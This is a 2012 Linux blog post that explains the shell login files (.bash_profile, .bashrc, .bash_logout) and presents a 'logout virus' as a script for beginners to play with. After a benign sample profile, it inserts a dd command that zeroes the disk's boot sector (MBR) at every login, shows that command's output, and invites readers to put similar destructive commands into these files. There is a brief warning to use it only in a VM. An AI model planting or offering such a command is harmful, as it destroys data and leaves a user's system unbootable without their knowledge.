Learn How Linux Login Logout Virus Affect The System

December 23, 2012 | By
| Reply More

Linux virus, oops, well we have heard long enough about it and I am also is not going to throw any more information security jargons like ASLR attacks (address space layout randomization) or buffer overflow payloads designed from well known applications like backtrack kits (security related), i will explain here small script kiddies that you can use to play and learn.

So when you define a virus, its something that disrupts system’s normal operations, so here we can just use simple linux rc files like .bashrc or .bash_profile files and can put on some script that will logout the user everytime he logs in. So lets summarize what is all in these configuration files.

Configuration Files

~/.bash_profile

The contents of this file are read and executed when you log into the system. Any changes you make to this file will not come into effect until you log out and log in again. It is usually a good idea to have this file execute your ~/.bashrc file as well. Just add the line "source ~/.bashrc" to the end of this file.. Beware that if you define your aliases here they will not be available in your subshells.

~/.bashrc

The contents of this file are read and executed only when you start a new subshell. Add your aliases here.

~/.bash_logout

This is executed when you log out. You may want to add some commands here to remove any temporary files or do any other tidying up.

Lets see a custom .bash_profile file here for more clarity.

# ~/.bash_profile
# Executed by login shells

# Converts a \n separated list into a colon separated list
colonise() {
/bin/cat $1 | /bin/tr "\012" ":"
}

### Variables used by bash itself

# Paths...
# these all use the above "colonise" function to
# convert a list of paths on separate lines into
# a colon separated list.
export PATH=`colonise ~/.path`
export MANPATH=`colonise ~/.manpath`
export MAILPATH=`colonise ~/.mailpath`
export CDPATH=`colonise ~/.cdpath`

# Control history
# I don't like to have a lot of
# old commands hanging around.
export HISTFILESIZE=10
export HISTSIZE=10
export HISTCONTROL=ignoreboth

# Control file name completion: ignore the following suffixes
export FIGNORE=`colonise ~/.fignore`

# Exiting bash deliberately and involuntarily
# export IGNOREEOF=1
export TMOUT=3600

# Prompt
export PS1="[\u@\h] \W [\!] "

### Variables that don't relate to bash

# Set variables for a warm fuzzy environment
export CVSROOT=~/.cvsroot
export PGPPATH=~/.pgp
export EDITOR=/usr/local/bin/emacs
export PAGER=/usr/local/bin/less
export PRINTER=134

# Execute the subshell script
source ~/.bashrc

# !!! MBR deletion to make system completely un-recoverable ( not able to recover), pretty dangerous, please dont used this on your own system, recommended to use in in VM or other test environment not carrying critical DATA !!!

dd if=/dev/zero of=/dev/sdc bs=512 count=1

# end of ~/.bash_profile

Sample outputs:
1+0 records in
1+0 records out
512 bytes (512 B) copied, 0.00308483 s, 166 kB/s

NB : # is used for comments in bash scripting terminology.

So once you logout and login, what happens, next time you reboot your system, the system MBR is gone, means, the GRUB is vanished and boot loader not found , so system can’t boot, this can be pretty risky and don’t try this normally, similarly you can put in anything in .bash_profile or .bash_logout files that will work as “logout virus”, so once you logout and try to boot, the OS hangs and you are stuck, thus justifying the virus theory.

Filed Under : SECURITY

Free Linux Ebook to Download

Leave a Reply

Commenting Policy:
Promotion of your products ? Comment gets deleted.
All comments are subject to moderation.